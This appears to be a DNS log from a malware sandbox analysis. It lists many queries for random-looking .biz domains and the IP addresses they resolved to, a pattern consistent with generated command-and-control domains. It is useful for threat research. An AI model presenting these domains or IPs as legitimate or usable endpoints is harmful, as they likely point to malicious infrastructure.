                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:53.648130894 CET192.168.2.101.1.1.10x7ea7Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.497812033 CET192.168.2.101.1.1.10xce10Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.814460039 CET192.168.2.101.1.1.10xa823Standard query (0)shpwbsrw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.992954969 CET192.168.2.101.1.1.10xbfecStandard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.326087952 CET192.168.2.101.1.1.10x6af5Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.008620977 CET192.168.2.101.1.1.10xabe9Standard query (0)cjvgcl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.009326935 CET192.168.2.101.1.1.10x1c79Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.054044008 CET192.168.2.101.1.1.10xc11aStandard query (0)neazudmrq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.214929104 CET192.168.2.101.1.1.10x7ec7Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.736587048 CET192.168.2.101.1.1.10xccc0Standard query (0)pgfsvwx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.962940931 CET192.168.2.101.1.1.10xf21dStandard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.033211946 CET192.168.2.101.1.1.10xf0e0Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.150006056 CET192.168.2.101.1.1.10x75efStandard query (0)aatcwo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.997330904 CET192.168.2.101.1.1.10xfd85Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.748310089 CET192.168.2.101.1.1.10x8066Standard query (0)kcyvxytog.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.216659069 CET192.168.2.101.1.1.10x85eaStandard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.273324966 CET192.168.2.101.1.1.10xa639Standard query (0)uevrpr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.197000980 CET192.168.2.101.1.1.10x5319Standard query (0)fgajqjyhr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.952408075 CET192.168.2.101.1.1.10xd3f3Standard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.245414972 CET192.168.2.101.1.1.10x66dcStandard query (0)hagujcj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.807478905 CET192.168.2.101.1.1.10xacf3Standard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.947033882 CET192.168.2.101.1.1.10x8841Standard query (0)sctmku.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.866301060 CET192.168.2.101.1.1.10x7050Standard query (0)cwyfknmwh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.882210016 CET192.168.2.101.1.1.10x797dStandard query (0)qcrsp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.295465946 CET192.168.2.101.1.1.10x8ac9Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.859077930 CET192.168.2.101.1.1.10x83cfStandard query (0)sewlqwcd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.200109959 CET192.168.2.101.1.1.10xb3c3Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.231291056 CET192.168.2.101.1.1.10xb3c3Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.542856932 CET192.168.2.101.1.1.10xbb55Standard query (0)dyjdrp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.381982088 CET192.168.2.101.1.1.10x58cStandard query (0)napws.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.965744972 CET192.168.2.101.1.1.10x8d32Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.236407995 CET192.168.2.101.1.1.10xbddfStandard query (0)qvuhsaqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.079943895 CET192.168.2.101.1.1.10x922fStandard query (0)apzzls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.492145061 CET192.168.2.101.1.1.10x2f6bStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.935467958 CET192.168.2.101.1.1.10xd8bbStandard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.965759993 CET192.168.2.101.1.1.10xd8bbStandard query (0)krnsmlmvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.214063883 CET192.168.2.101.1.1.10xb5f2Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.705864906 CET192.168.2.101.1.1.10x9204Standard query (0)nlscndwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.800775051 CET192.168.2.101.1.1.10xb74cStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.809329987 CET192.168.2.101.1.1.10xfd4eStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.571599960 CET192.168.2.101.1.1.10xfd4cStandard query (0)bzkysubds.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.279855013 CET192.168.2.101.1.1.10xa897Standard query (0)ltpqsnu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.937752008 CET192.168.2.101.1.1.10x4e7Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.949760914 CET192.168.2.101.1.1.10x7ffbStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.961751938 CET192.168.2.101.1.1.10xde5Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.012873888 CET192.168.2.101.1.1.10x5ef7Standard query (0)vnvbt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.915997982 CET192.168.2.101.1.1.10x1e31Standard query (0)ypituyqsq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.606079102 CET192.168.2.101.1.1.10x658aStandard query (0)ijnmvqa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.472233057 CET192.168.2.101.1.1.10x89abStandard query (0)tltxn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.176280022 CET192.168.2.101.1.1.10x9b7aStandard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.199852943 CET192.168.2.101.1.1.10x9b7aStandard query (0)vgypotwp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.121767998 CET192.168.2.101.1.1.10xe1dStandard query (0)giliplg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.973263025 CET192.168.2.101.1.1.10x8498Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.832979918 CET192.168.2.101.1.1.10x1b85Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.309295893 CET192.168.2.101.1.1.10xb4f1Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.170142889 CET192.168.2.101.1.1.10x4d5aStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.859144926 CET192.168.2.101.1.1.10x6bc4Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.207818031 CET192.168.2.101.1.1.10x470aStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.215356112 CET192.168.2.101.1.1.10xf990Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.939558029 CET192.168.2.101.1.1.10xa28Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.692629099 CET192.168.2.101.1.1.10xbb2Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.702120066 CET192.168.2.101.1.1.10x2a3eStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.712905884 CET192.168.2.101.1.1.10x45e4Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.934891939 CET192.168.2.101.1.1.10x795cStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.435702085 CET192.168.2.101.1.1.10xa413Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.921685934 CET192.168.2.101.1.1.10xee63Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:14.949841022 CET192.168.2.101.1.1.10xee63Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.723961115 CET192.168.2.101.1.1.10x6992Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.212035894 CET192.168.2.101.1.1.10x35faStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.710921049 CET192.168.2.101.1.1.10xb9d5Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:38.646301031 CET1.1.1.1192.168.2.100x1f8bNo error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.158921957 CET1.1.1.1192.168.2.100xa3b7No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:39.622997046 CET1.1.1.1192.168.2.100x9aa7No error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:40.644891024 CET1.1.1.1192.168.2.100x1368No error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:43.754018068 CET1.1.1.1192.168.2.100x9db4No error (0)vyome.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:44.930850983 CET1.1.1.1192.168.2.100x57deNo error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:45.692023993 CET1.1.1.1192.168.2.100xf6a6No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:47.476150036 CET1.1.1.1192.168.2.100xb50No error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:49.120292902 CET1.1.1.1192.168.2.100x204fNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:50.181557894 CET1.1.1.1192.168.2.100x94b2No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:51.881726980 CET1.1.1.1192.168.2.100x614aNo error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:53.700316906 CET1.1.1.1192.168.2.100x1409No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:54.763137102 CET1.1.1.1192.168.2.100xa6d5No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:55.769454956 CET1.1.1.1192.168.2.100xd737No error (0)qpnczch.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.208944082 CET1.1.1.1192.168.2.100x5e68No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:56.875849009 CET1.1.1.1192.168.2.100xcfbdNo error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:57.723516941 CET1.1.1.1192.168.2.100x7462No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:58.178086042 CET1.1.1.1192.168.2.100x358No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.213181019 CET1.1.1.1192.168.2.100xf938No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.480237007 CET1.1.1.1192.168.2.100x1a48No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:59.898606062 CET1.1.1.1192.168.2.100xf7beNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.152344942 CET1.1.1.1192.168.2.100xa89bNo error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.390362978 CET1.1.1.1192.168.2.100x8829No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:01.390362978 CET1.1.1.1192.168.2.100x8829No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.284394026 CET1.1.1.1192.168.2.100x372aNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:02.757179976 CET1.1.1.1192.168.2.100xd431No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:03.999672890 CET1.1.1.1192.168.2.100xb0baNo error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:04.510721922 CET1.1.1.1192.168.2.100xeb0dNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.046273947 CET1.1.1.1192.168.2.100x198bNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:05.188525915 CET1.1.1.1192.168.2.100x199No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.007972956 CET1.1.1.1192.168.2.100x2102No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:06.774127007 CET1.1.1.1192.168.2.100x8beeNo error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.484714031 CET1.1.1.1192.168.2.100x7428No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.998799086 CET1.1.1.1192.168.2.100xbe24No error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.190537930 CET1.1.1.1192.168.2.100x9584No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.054012060 CET1.1.1.1192.168.2.100x4c4dNo error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.942346096 CET1.1.1.1192.168.2.100x1ccNo error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.036597967 CET1.1.1.1192.168.2.100xabddNo error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.614134073 CET1.1.1.1192.168.2.100x92e9No error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.614134073 CET1.1.1.1192.168.2.100x92e9No error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.137264967 CET1.1.1.1192.168.2.100x38caNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.428381920 CET1.1.1.1192.168.2.100x5416No error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.267740965 CET1.1.1.1192.168.2.100x89cNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.639168978 CET1.1.1.1192.168.2.100x631aNo error (0)xccjj.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:14.541354895 CET1.1.1.1192.168.2.100xe17dNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.211981058 CET1.1.1.1192.168.2.100x7dafNo error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:15.423075914 CET1.1.1.1192.168.2.100x6818No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.309216976 CET1.1.1.1192.168.2.100x2f6No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:16.416829109 CET1.1.1.1192.168.2.100xbca7No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.112137079 CET1.1.1.1192.168.2.100x747dNo error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:18.112476110 CET1.1.1.1192.168.2.100x99deNo error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.061002970 CET1.1.1.1192.168.2.100xc11aNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.221811056 CET1.1.1.1192.168.2.100x7ec7No error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.750185966 CET1.1.1.1192.168.2.100xccc0No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.970390081 CET1.1.1.1192.168.2.100xf21dNo error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.041316986 CET1.1.1.1192.168.2.100xf0e0No error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:00.248936892 CET1.1.1.1192.168.2.100x75efNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.004956007 CET1.1.1.1192.168.2.100xfd85No error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.755487919 CET1.1.1.1192.168.2.100x8066No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.080004930 CET1.1.1.1192.168.2.100x4e16No error (0)pectx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.057163000 CET1.1.1.1192.168.2.100x9710No error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.057513952 CET1.1.1.1192.168.2.100x718fNo error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.760166883 CET1.1.1.1192.168.2.100x95f5No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.478686094 CET1.1.1.1192.168.2.100x8507No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:04.584542990 CET1.1.1.1192.168.2.100xe7dNo error (0)ereplfx.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.480544090 CET1.1.1.1192.168.2.100x5134No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:05.980732918 CET1.1.1.1192.168.2.100xa2afNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.678910971 CET1.1.1.1192.168.2.100xa4b1No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.991214037 CET1.1.1.1192.168.2.100xee23No error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.139549971 CET1.1.1.1192.168.2.100xfc39No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.848579884 CET1.1.1.1192.168.2.100x37ceNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.848579884 CET1.1.1.1192.168.2.100x37ceNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.988526106 CET1.1.1.1192.168.2.100xd203No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:09.671540022 CET1.1.1.1192.168.2.100x71daNo error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.204550982 CET1.1.1.1192.168.2.100x291No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:10.362658978 CET1.1.1.1192.168.2.100x934dNo error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.137583971 CET1.1.1.1192.168.2.100xd3ceNo error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:11.849802017 CET1.1.1.1192.168.2.100xd255No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
